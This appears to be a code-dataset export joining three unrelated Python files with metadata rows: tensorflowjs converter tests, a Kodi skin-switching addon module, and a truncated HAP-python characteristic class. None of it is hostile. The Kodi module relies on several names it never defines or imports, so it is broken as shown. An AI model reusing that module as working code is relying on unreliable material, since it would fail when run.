self.tf_hub_module_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'shape': [2],
'name': 'module/Variable',
'dtype': 'float32'
}]
}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFSavedModelWithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_saved_model',
'--output_format', 'tfjs_graph_model',
self.tf_saved_model_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'dtype': 'float32',
'shape': [],
'name': 'StatefulPartitionedCall/mul'
}]
}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
weights_manifest = output_json['weightsManifest']
self.assertEqual(len(weights_manifest), len(weights))
if sys.version_info[0] < 3:
self.assertItemsEqual(weights_manifest[0]['paths'],
weights[0]['paths'])
self.assertItemsEqual(weights_manifest[0]['weights'],
weights[0]['weights'])
else:
self.assertCountEqual(weights_manifest[0]['paths'],
weights[0]['paths'])
self.assertCountEqual(weights_manifest[0]['weights'],
weights[0]['weights'])
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFHubModuleWithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_hub',
self.tf_hub_module_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'shape': [2],
'name': 'module/Variable',
'dtype': 'float32'
}]
}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTensorflowjsArtifactsToKerasH5(self):
# 1. Create a toy keras model and save it as an HDF5 file.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
with tf.Graph().as_default(), tf.compat.v1.Session():
model = _createKerasModel('MergedDenseForCLI', h5_path)
model_json = model.to_json()
# 2. Convert the HDF5 file to tensorflowjs format.
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tensorflowjs artifacts back to HDF5.
new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras',
os.path.join(self._tmp_dir, 'model.json'), new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Load the model back from the new HDF5 file and compare with the
# original model.
with tf.Graph().as_default(), tf.compat.v1.Session():
model_2 = keras.models.load_model(new_h5_path)
model_2_json = model_2.to_json()
self.assertEqual(model_json, model_2_json)
def testLoadTensorflowjsArtifactsAsKerasModel(self):
# 1. Create a toy keras model and save it as an HDF5 file.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
with tf.Graph().as_default(), tf.compat.v1.Session():
model = _createKerasModel('MergedDenseForCLI', h5_path)
model_json = model.to_json()
# 2. Convert the HDF5 file to tensorflowjs format.
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Load the tensorflowjs artifacts as a keras.Model instance.
with tf.Graph().as_default(), tf.compat.v1.Session():
model_2 = tfjs.converters.load_keras_model(
os.path.join(self._tmp_dir, 'model.json'))
model_2_json = model_2.to_json()
self.assertEqual(model_json, model_2_json)
def testVersion(self):
process = subprocess.Popen(
['tensorflowjs_converter', '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertIn(
tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
tf.compat.as_bytes(stdout))
process = subprocess.Popen(
['tensorflowjs_converter', '-v'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = process.communicate()
self.assertEqual(0, process.returncode)
self.assertIn(
tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),
tf.compat.as_bytes(stdout))
class ConvertTfKerasSavedModelTest(tf.test.TestCase):
def setUp(self):
super(ConvertTfKerasSavedModelTest, self).setUp()
self._tmp_dir = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(ConvertTfKerasSavedModelTest, self).tearDown()
def _createSimpleSequentialModel(self):
model = keras.Sequential()
model.add(keras.layers.Reshape([2, 3], input_shape=[6]))
model.add(keras.layers.LSTM(10))
model.add(keras.layers.Dense(1, activation='sigmoid'))
return model
def _createNestedSequentialModel(self):
model = keras.Sequential()
model.add(keras.layers.Dense(6, input_shape=[10], activation='relu'))
model.add(self._createSimpleSequentialModel())
return model
def _createFunctionalModelWithWeights(self):
input1 = keras.Input(shape=[8])
input2 = keras.Input(shape=[10])
y = keras.layers.Concatenate()([input1, input2])
y = keras.layers.Dense(4, activation='softmax')(y)
model = keras.Model([input1, input2], y)
return model
def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
model_json_path = os.path.join(tfjs_output_dir, 'model.json')
self.assertTrue(os.path.isfile(model_json_path))
# 3. Convert the tfjs model to keras h5 format.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras', model_json_path, new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
self.assertTrue(os.path.isfile(new_h5_path))
# 4. Load the model back and assert on the equality of the predict
# results.
model_prime = keras.models.load_model(new_h5_path)
new_y = model_prime.predict(x)
self.assertAllClose(y, new_y)
def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x1 = np.random.randn(4, 8)
x2 = np.random.randn(4, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createFunctionalModelWithWeights()
y = model.predict([x1, x2])
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Use explicit --output_format value: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
'--output_format', 'tfjs_layers_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
model_json_path = os.path.join(tfjs_output_dir, 'model.json')
self.assertTrue(os.path.isfile(model_json_path))
# 3. Convert the tfjs model to keras h5 format.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras', model_json_path, new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
self.assertTrue(os.path.isfile(new_h5_path))
# 4. Load the model back and assert on the equality of the predict
# results.
model_prime = keras.models.load_model(new_h5_path)
new_y = model_prime.predict([x1, x2])
self.assertAllClose(y, new_y)
def testUsingIncorrectKerasSavedModelRaisesError(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Use incorrect --input_format value: keras
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format', 'keras',
self._tmp_dir, tfjs_output_dir
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertIn(
b'Expected path to point to an HDF5 file, '
b'but it points to a directory', tf.compat.as_bytes(stderr))
def testConvertTfjsLayersModelIntoShardedWeights(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
weights = model.get_weights()
total_weight_bytes = sum(np.size(w) for w in weights) * 4
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs_layers_model format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_layers_model,
# with sharded weights.
weight_shard_size_bytes = int(total_weight_bytes * 0.3)
# Due to the shard size, there ought to be 4 shards after conversion.
sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_layers_model',
'--weight_shard_size_bytes', str(weight_shard_size_bytes),
os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the sharded weight files and their sizes.
weight_files = sorted(
glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 4)
weight_file_sizes = [os.path.getsize(f) for f in weight_files]
self.assertEqual(sum(weight_file_sizes), total_weight_bytes)
self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])
self.assertEqual(weight_file_sizes[0], weight_file_sizes[2])
self.assertLess(weight_file_sizes[3], weight_file_sizes[0])
# 5. Convert the sharded tfjs_layers_model back into a keras h5 file.
new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
os.path.join(sharded_model_dir, 'model.json'), new_h5_path
])
process.communicate()
self.assertEqual(0, process.returncode)
with tf.Graph().as_default(), tf.compat.v1.Session():
# 6. Load the keras model and check the predict() output is close to
# before.
new_model = keras.models.load_model(new_h5_path)
new_y = new_model.predict(x)
self.assertAllClose(new_y, y)
def testConvertTfjsLayersModelWithQuantization(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
x = np.random.randn(8, 10)
# 1. Run the model.predict(), store the result. Then saved the model
# as a SavedModel.
model = self._createNestedSequentialModel()
y = model.predict(x)
weights = model.get_weights()
total_weight_bytes = sum(np.size(w) for w in weights) * 4
keras.experimental.export_saved_model(model, self._tmp_dir)
# 2. Convert the keras saved model to tfjs_layers_model format.
tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras_saved_model',
self._tmp_dir, tfjs_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_layers_model,
# with uint16 quantization.
weight_shard_size_bytes = int(total_weight_bytes * 0.3)
# Due to the shard size, there ought to be 4 shards after conversion.
sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_layers_model',
'--quantization_bytes', '2',
os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the quantized weight file and its size.
weight_files = sorted(
glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 1)
weight_file_size = os.path.getsize(weight_files[0])
# The size of the weight file should reflect the uint16 quantization.
self.assertEqual(weight_file_size, total_weight_bytes // 2)
def testConvertTfjsLayersModelToTfjsGraphModel(self):
x = np.random.randn(8, 10)
# 1. Create a model for testing.
model = keras.Sequential()
model.add(keras.layers.Dense(10, activation='relu', input_shape=[4]))
model.add(keras.layers.Dense(1, activation='sigmoid'))
h5_path = os.path.join(self._tmp_dir, 'model.h5')
model.save(h5_path)
# 2. Convert the keras saved model to tfjs_layers_model format.
layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers')
# Implicit value of --output_format: tfjs_layers_model
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras',
h5_path, layers_model_output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tfjs_layers_model to another tfjs_graph_model.
graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'tfjs_graph_model',
os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Check the model.json and weight file and its size.
self.assertTrue(os.path.isfile(os.path.join(graph_model_dir, 'model.json')))
weight_files = sorted(
glob.glob(os.path.join(graph_model_dir, 'group*.bin')))
self.assertEqual(len(weight_files), 1)
if __name__ == '__main__':
tf.test.main()
| 38.741419
| 88
| 0.674778
| 4,231
| 33,860
| 5.193808
| 0.099504
| 0.019113
| 0.027759
| 0.023572
| 0.705893
| 0.676724
| 0.647645
| 0.629989
| 0.605961
| 0.58967
| 0
| 0.014756
| 0.205434
| 33,860
| 873
| 89
| 38.785796
| 0.802037
| 0.167218
| 0
| 0.643902
| 0
| 0
| 0.137504
| 0.038757
| 0
| 0
| 0
| 0
| 0.162602
| 1
| 0.056911
| false
| 0
| 0.037398
| 0
| 0.104065
| 0.001626
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869310d00b7b8dcf8e18a56efd569e5ae8396471
| 7,195
|
py
|
Python
|
script.ezclean/resources/lib/modules/skinz.py
|
rrosajp/script.ezclean
|
ed6fbe6441713a3c96ce15a595cdd5c69291355f
|
[
"MIT"
] | 5
|
2019-03-12T23:10:48.000Z
|
2021-05-06T05:31:26.000Z
|
script.ezclean/resources/lib/modules/skinz.py
|
rrosajp/script.ezclean-1
|
ed6fbe6441713a3c96ce15a595cdd5c69291355f
|
[
"MIT"
] | 3
|
2019-03-17T21:53:29.000Z
|
2019-04-22T16:44:38.000Z
|
script.ezclean/resources/lib/modules/skinz.py
|
rrosajp/script.ezclean-1
|
ed6fbe6441713a3c96ce15a595cdd5c69291355f
|
[
"MIT"
] | 4
|
2019-03-17T21:17:19.000Z
|
2020-03-30T12:45:33.000Z
|
# -*- coding: UTF-8 -*-
import os, re, shutil, time, xbmc
from resources.lib.modules import control
try: import json as simplejson
except: import simplejson
ADDONS = os.path.join(control.HOMEPATH, 'addons')
def currSkin():
return control.skin
def getOld(old):
try:
old = '"%s"' % old
query = '{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":%s}, "id":1}' % (old)
response = control.jsonrpc(query)
response = simplejson.loads(response)
if response.has_key('result'):
if response['result'].has_key('value'):
return response ['result']['value']
except:
pass
return None
def setNew(new, value):
try:
new = '"%s"' % new
value = '"%s"' % value
query = '{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":%s,"value":%s}, "id":1}' % (new, value)
response = control.jsonrpc(query)
except:
pass
return None
def swapSkins(skin):
old = 'lookandfeel.skin'
value = skin
current = getOld(old)
new = old
setNew(new, value)
def lookandFeelData(do='save'):
scan = ['lookandfeel.enablerssfeeds', 'lookandfeel.font', 'lookandfeel.rssedit', 'lookandfeel.skincolors', 'lookandfeel.skintheme', 'lookandfeel.skinzoom', 'lookandfeel.soundskin', 'lookandfeel.startupwindow', 'lookandfeel.stereostrength']
if do == 'save':
for item in scan:
query = '{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"%s"}, "id":1}' % (item)
response = control.jsonrpc(query)
if not 'error' in response:
match = re.compile('{"value":(.+?)}').findall(str(response))
control.setSetting(item.replace('lookandfeel', 'default'), match[0])
control.log("%s saved to %s" % (item, match[0]))
else:
for item in scan:
value = setting(item.replace('lookandfeel', 'default'))
query = '{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"%s","value":%s}, "id":1}' % (item, value)
response = control.jsonrpc(query)
control.log("%s restored to %s" % (item, value))
def defaultSkin():
control.log("[Default Skin Check]")
tempgui = os.path.join(USERDATAPATH, 'guitemp.xml')
gui = tempgui if os.path.exists(tempgui) else GUISETTINGS
if not os.path.exists(gui): return False
control.log("Reading gui file: %s" % gui)
guif = open(gui, 'r+')
msg = guif.read().replace('\n','').replace('\r','').replace('\t','').replace(' ',''); guif.close()
control.log("Opening gui settings")
match = re.compile('<lookandfeel>.+?<ski.+?>(.+?)</skin>.+?</lookandfeel>').findall(msg)
control.log("Matches: %s" % str(match))
if len(match) > 0:
skinid = match[0]
addonxml = os.path.join(ADDONS, match[0], 'addon.xml')
if os.path.exists(addonxml):
addf = open(addonxml, 'r+')
msg2 = addf.read().replace('\n','').replace('\r','').replace('\t',''); addf.close()
match2 = re.compile('<addon.+?ame="(.+?)".+?>').findall(msg2)
if len(match2) > 0: skinname = match2[0]
else: skinname = 'no match'
else: skinname = 'no file'
control.log("[Default Skin Check] Skin name: %s" % skinname)
control.log("[Default Skin Check] Skin id: %s" % skinid)
control.setSetting('defaultskin', skinid)
control.setSetting('defaultskinname', skinname)
control.setSetting('defaultskinignore', 'false')
if os.path.exists(tempgui):
control.log("Deleting Temp Gui File.")
os.remove(tempgui)
control.log("[Default Skin Check] End")
def checkSkin():
control.loga("Invalid Skin Check Start")
DEFAULTSKIN = setting('defaultskin')
DEFAULTNAME = setting('defaultskinname')
DEFAULTIGNORE = setting('defaultskinignore')
gotoskin = False
if not DEFAULTSKIN == '':
if os.path.exists(os.path.join(ADDONS, DEFAULTSKIN)):
if DIALOG.yesno(AddonTitle, "[COLOR %s]It seems that the skin has been set back to [COLOR %s]%s[/COLOR]" % (COLOR2, COLOR1, SKIN[5:].title()), "Would you like to set the skin back to:[/COLOR]", '[COLOR %s]%s[/COLOR]' % (COLOR1, DEFAULTNAME)):
gotoskin = DEFAULTSKIN
gotoname = DEFAULTNAME
else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true'); gotoskin = False
else: control.setSetting('defaultskin', ''); control.setSetting('defaultskinname', ''); DEFAULTSKIN = ''; DEFAULTNAME = ''
if DEFAULTSKIN == '':
skinname = []
skinlist = []
for folder in glob.glob(os.path.join(ADDONS, 'skin.*/')):
xml = "%s/addon.xml" % folder
if os.path.exists(xml):
f = open(xml,mode='r'); g = f.read().replace('\n','').replace('\r','').replace('\t',''); f.close();
match = re.compile('<addon.+?id="(.+?)".+?>').findall(g)
match2 = re.compile('<addon.+?name="(.+?)".+?>').findall(g)
control.loga("%s: %s" % (folder, str(match[0])))
if len(match) > 0: skinlist.append(str(match[0])); skinname.append(str(match2[0]))
else: control.loga("ID not found for %s" % folder)
else: control.loga("ID not found for %s" % folder)
if len(skinlist) > 0:
if len(skinlist) > 1:
if DIALOG.yesno(control.AddonTitle, "[COLOR %s]It seems that the skin has been set back to [COLOR %s]%s[/COLOR]" % (COLOR2, COLOR1, SKIN[5:].title()), "Would you like to view a list of avaliable skins?[/COLOR]"):
choice = DIALOG.select("Select skin to switch to!", skinname)
if choice == -1: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true')
else:
gotoskin = skinlist[choice]
gotoname = skinname[choice]
else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true')
else:
if DIALOG.yesno(control.AddonTitle, "It seems that the skin has been set back to [B]%s[/B]" % (SKIN[5:].title()), "Would you like to set the skin back to: ", '[B] %s [/B]' % (skinname[0])):
gotoskin = skinlist[0]
gotoname = skinname[0]
else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true')
else: control.loga("No skins found in addons folder."); control.setSetting('defaultskinignore', 'true'); gotoskin = False
if gotoskin:
swapSkins(gotoskin)
x = 0
control.sleep(1000)
while not control.condVisibility("Window.isVisible(yesnodialog)") and x < 150:
x += 1
control.sleep(200)
if control.condVisibility("Window.isVisible(yesnodialog)"):
control.execute('SendClick(11)')
lookandFeelData('restore')
else: control.Notify(control.AddonTitle,'Skin Swap Timed Out!')
control.loga("Invalid Skin Check End")
| 46.720779
| 254
| 0.580542
| 826
| 7,195
| 5.054479
| 0.232446
| 0.015808
| 0.017246
| 0.016766
| 0.36024
| 0.262515
| 0.232814
| 0.212695
| 0.212695
| 0.195928
| 0
| 0.010876
| 0.246004
| 7,195
| 153
| 255
| 47.026144
| 0.75871
| 0.002919
| 0
| 0.157895
| 0
| 0.045113
| 0.282845
| 0.082287
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0.015038
| 0.030075
| 0.007519
| 0.112782
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86939231df10a74a6b6c8263b5d61c5806d7e19e
| 10,360
|
py
|
Python
|
pyhap/characteristic.py
|
bdraco/HAP-python
|
a2a5ce109d08af2f4f5bda4075f2176a98123806
|
[
"Apache-2.0"
] | null | null | null |
pyhap/characteristic.py
|
bdraco/HAP-python
|
a2a5ce109d08af2f4f5bda4075f2176a98123806
|
[
"Apache-2.0"
] | null | null | null |
pyhap/characteristic.py
|
bdraco/HAP-python
|
a2a5ce109d08af2f4f5bda4075f2176a98123806
|
[
"Apache-2.0"
] | null | null | null |
"""
All things for a HAP characteristic.
A Characteristic is the smallest unit of the smart home, e.g.
a temperature measuring or a device status.
"""
import logging
from pyhap.const import (
HAP_PERMISSION_READ,
HAP_REPR_DESC,
HAP_REPR_FORMAT,
HAP_REPR_IID,
HAP_REPR_MAX_LEN,
HAP_REPR_PERM,
HAP_REPR_TYPE,
HAP_REPR_VALID_VALUES,
HAP_REPR_VALUE,
)
from .util import hap_type_to_uuid, uuid_to_hap_type
logger = logging.getLogger(__name__)
# ### HAP Format ###
HAP_FORMAT_BOOL = "bool"
HAP_FORMAT_INT = "int"
HAP_FORMAT_FLOAT = "float"
HAP_FORMAT_STRING = "string"
HAP_FORMAT_ARRAY = "array"
HAP_FORMAT_DICTIONARY = "dictionary"
HAP_FORMAT_UINT8 = "uint8"
HAP_FORMAT_UINT16 = "uint16"
HAP_FORMAT_UINT32 = "uint32"
HAP_FORMAT_UINT64 = "uint64"
HAP_FORMAT_DATA = "data"
HAP_FORMAT_TLV8 = "tlv8"
HAP_FORMAT_DEFAULTS = {
HAP_FORMAT_BOOL: False,
HAP_FORMAT_INT: 0,
HAP_FORMAT_FLOAT: 0.0,
HAP_FORMAT_STRING: "",
HAP_FORMAT_ARRAY: "",
HAP_FORMAT_DICTIONARY: "",
HAP_FORMAT_UINT8: 0,
HAP_FORMAT_UINT16: 0,
HAP_FORMAT_UINT32: 0,
HAP_FORMAT_UINT64: 0,
HAP_FORMAT_DATA: "",
HAP_FORMAT_TLV8: "",
}
HAP_FORMAT_NUMERICS = (
HAP_FORMAT_INT,
HAP_FORMAT_FLOAT,
HAP_FORMAT_UINT8,
HAP_FORMAT_UINT16,
HAP_FORMAT_UINT32,
HAP_FORMAT_UINT64,
)
# ### HAP Units ###
HAP_UNIT_ARC_DEGREE = "arcdegrees"
HAP_UNIT_CELSIUS = "celsius"
HAP_UNIT_LUX = "lux"
HAP_UNIT_PERCENTAGE = "percentage"
HAP_UNIT_SECONDS = "seconds"
# ### Properties ###
PROP_FORMAT = "Format"
PROP_MAX_VALUE = "maxValue"
PROP_MIN_STEP = "minStep"
PROP_MIN_VALUE = "minValue"
PROP_PERMISSIONS = "Permissions"
PROP_UNIT = "unit"
PROP_VALID_VALUES = "ValidValues"
PROP_NUMERIC = (PROP_MAX_VALUE, PROP_MIN_VALUE, PROP_MIN_STEP, PROP_UNIT)
class CharacteristicError(Exception):
"""Generic exception class for characteristic errors."""
class Characteristic:
"""Represents a HAP characteristic, the smallest unit of the smart home.
A HAP characteristic is some measurement or state, like battery status or
the current temperature. Characteristics are contained in services.
Each characteristic has a unique type UUID and a set of properties,
like format, min and max values, valid values and others.
"""
__slots__ = (
"broker",
"display_name",
"properties",
"type_id",
"value",
"getter_callback",
"setter_callback",
"service",
"_uuid_str",
"_loader_display_name",
)
def __init__(self, display_name, type_id, properties):
"""Initialise with the given properties.
:param display_name: Name that will be displayed for this
characteristic, i.e. the `description` in the HAP representation.
:type display_name: str
:param type_id: UUID unique to this type of characteristic.
:type type_id: uuid.UUID
:param properties: A dict of properties, such as Format,
ValidValues, etc.
:type properties: dict
"""
self.broker = None
self.display_name = display_name
self.properties = properties
self.type_id = type_id
self.value = self._get_default_value()
self.getter_callback = None
self.setter_callback = None
self.service = None
self._uuid_str = uuid_to_hap_type(type_id)
self._loader_display_name = None
def __repr__(self):
"""Return the representation of the characteristic."""
return "<characteristic display_name={} value={} properties={}>".format(
self.display_name, self.value, self.properties
)
def _get_default_value(self):
"""Return default value for format."""
if self.properties.get(PROP_VALID_VALUES):
return min(self.properties[PROP_VALID_VALUES].values())
value = HAP_FORMAT_DEFAULTS[self.properties[PROP_FORMAT]]
return self.to_valid_value(value)
def get_value(self):
"""This is to allow for calling `getter_callback`
:return: Current Characteristic Value
"""
if self.getter_callback:
# pylint: disable=not-callable
self.value = self.to_valid_value(value=self.getter_callback())
return self.value
def to_valid_value(self, value):
"""Perform validation and conversion to valid value."""
if self.properties.get(PROP_VALID_VALUES):
if value not in self.properties[PROP_VALID_VALUES].values():
error_msg = "{}: value={} is an invalid value.".format(
self.display_name, value
)
logger.error(error_msg)
raise ValueError(error_msg)
elif self.properties[PROP_FORMAT] == HAP_FORMAT_STRING:
value = str(value)[:256]
elif self.properties[PROP_FORMAT] == HAP_FORMAT_BOOL:
value = bool(value)
elif self.properties[PROP_FORMAT] in HAP_FORMAT_NUMERICS:
if not isinstance(value, (int, float)):
error_msg = "{}: value={} is not a numeric value.".format(
self.display_name, value
)
logger.error(error_msg)
raise ValueError(error_msg)
value = min(self.properties.get(PROP_MAX_VALUE, value), value)
value = max(self.properties.get(PROP_MIN_VALUE, value), value)
return value
def override_properties(self, properties=None, valid_values=None):
"""Override characteristic property values and valid values.
:param properties: Dictionary with values to override the existing
properties. Only changed values are required.
:type properties: dict
:param valid_values: Dictionary with values to override the existing
valid_values. Valid values will be set to new dictionary.
:type valid_values: dict
"""
if not properties and not valid_values:
raise ValueError("No properties or valid_values specified to override.")
if properties:
self.properties.update(properties)
if valid_values:
self.properties[PROP_VALID_VALUES] = valid_values
try:
self.value = self.to_valid_value(self.value)
except ValueError:
self.value = self._get_default_value()
def set_value(self, value, should_notify=True):
"""Set the given raw value. It is checked if it is a valid value.
If not set_value will be aborted and an error message will be
displayed.
`Characteristic.setter_callback`
You may also define a `setter_callback` on the `Characteristic`.
This will be called with the value being set as the arg.
.. seealso:: Characteristic.value
:param value: The value to assign as this Characteristic's value.
:type value: Depends on properties["Format"]
:param should_notify: Whether a the change should be sent to
subscribed clients. Notify will be performed if the broker is set.
:type should_notify: bool
"""
logger.debug("set_value: %s to %s", self.display_name, value)
value = self.to_valid_value(value)
self.value = value
if should_notify and self.broker:
self.notify()
def client_update_value(self, value, sender_client_addr=None):
"""Called from broker for value change in Home app.
Change self.value to value and call callback.
"""
logger.debug(
"client_update_value: %s to %s from client: %s",
self.display_name,
value,
sender_client_addr,
)
self.value = value
self.notify(sender_client_addr)
if self.setter_callback:
# pylint: disable=not-callable
self.setter_callback(value)
def notify(self, sender_client_addr=None):
"""Notify clients about a value change. Sends the value.
.. seealso:: accessory.publish
.. seealso:: accessory_driver.publish
"""
self.broker.publish(self.value, self, sender_client_addr)
# pylint: disable=invalid-name
def to_HAP(self):
"""Create a HAP representation of this Characteristic.
Used for json serialization.
:return: A HAP representation.
:rtype: dict
"""
hap_rep = {
HAP_REPR_IID: self.broker.iid_manager.get_iid(self),
HAP_REPR_TYPE: self._uuid_str,
HAP_REPR_PERM: self.properties[PROP_PERMISSIONS],
HAP_REPR_FORMAT: self.properties[PROP_FORMAT],
}
# HAP_REPR_DESC (description) is optional and takes up
# quite a bit of space in the payload. Only include it
# if it has been changed from the default loader version
if (
not self._loader_display_name
or self._loader_display_name != self.display_name
):
hap_rep[HAP_REPR_DESC] = self.display_name
value = self.get_value()
if self.properties[PROP_FORMAT] in HAP_FORMAT_NUMERICS:
hap_rep.update(
